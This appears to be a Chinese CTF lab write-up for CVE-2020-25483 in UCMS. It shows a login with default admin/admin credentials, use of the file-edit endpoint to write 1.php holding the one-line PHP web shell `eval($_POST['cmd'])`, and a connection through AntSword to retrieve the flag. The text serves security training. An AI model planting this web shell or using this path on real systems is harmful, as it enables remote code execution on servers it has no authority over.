春秋云境CVE-2020-25483

1.阅读靶场介绍

这里得到就是文件写入

然后再读取文件

2.启动靶场

如下图所示

这里我们可以直接再url后面加上

/ucms/login.php

进入下面所示的页面

这里输入账号/密码:admin/admin

下一步就是输入如下图的url

各位可以参考参考

https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.phpw

然后在下面输入这个木马

复制代码
<?php @eval($_POST['cmd']);?>

然后访问

这个url:https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/1.php

得到的是一片空白那就是对的

3.中国蚁剑启动

输入这些参数

然后就可以找到flag了

感谢各位的观看哟

相关推荐
Chockmans3 小时前
图片马合成保姆级教程
web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构·春秋云境
Chengbei114 小时前
红队专属Bing Dork自动化工具,敏感信息侦察效率拉满、自动生成可视化信息泄露审计报告
java·人工智能·安全·web安全·网络安全·自动化·系统安全
C2H5OH4 小时前
PortSwigger SQL注入LAB3
网络安全
treesforest5 小时前
IP 反欺诈查询怎么落地更稳?Ipdatacloud 适用场景与实战决策闭环
网络·数据库·网络协议·tcp/ip·网络安全
Suckerbin6 小时前
vulnyx-Care靶场渗透
安全·web安全·网络安全
一名优秀的码农6 小时前
vulhub系列-70-Ripper(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
鱼大大博客8 小时前
如何为网站选择合适的服务器?
网络·web安全·ddos
一名优秀的码农8 小时前
vulhub系列-80-Venom: 1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
PinTrust SSL证书10 小时前
Sectigo(Comodo)域名型DV通配符SSL
网络·网络协议·http·网络安全·https·软件工程·ssl
2301_7807896611 小时前
2025年ddos防护还能防护住越来越大的ddos攻击吗
网络·后端·tcp/ip·网络安全·架构·ddos